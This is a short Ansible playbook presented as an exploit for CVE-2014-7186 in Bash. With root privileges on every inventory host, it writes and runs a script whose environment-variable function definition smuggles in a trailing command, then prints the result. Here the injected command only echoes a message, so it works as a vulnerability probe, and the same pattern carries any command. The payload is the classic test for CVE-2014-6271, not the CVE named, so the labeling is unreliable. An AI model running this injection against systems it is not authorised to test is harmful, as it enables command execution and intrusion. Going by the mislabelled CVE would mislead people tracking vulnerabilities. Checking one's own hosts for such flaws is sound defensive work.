---
- name: Exploit CVE-2014-7186 (Bash Vulnerability)
  hosts: all
  become: yes
  vars:
    exploit_file: "/tmp/exploit.sh"

  tasks:
    - name: Ensure bash is installed (if it's missing)
      apt:
        name: bash
        state: present
        update_cache: yes

    - name: Create the Exploit script
      copy:
        dest: "{{ exploit_file }}"
        content: |
          #!/bin/bash
          # Exploit for CVE-2014-7186
          env x='() { :;}; echo Vulnerable' bash -c "echo Exploit Triggered"

    - name: Make the exploit script executable
      file:
        path: "{{ exploit_file }}"
        mode: '0755'

    - name: Execute the exploit
      command: "{{ exploit_file }}"
      register: exploit_result
      ignore_errors: yes

    - name: Show the result of the exploit
      debug:
        msg: "{{ exploit_result.stdout }}"

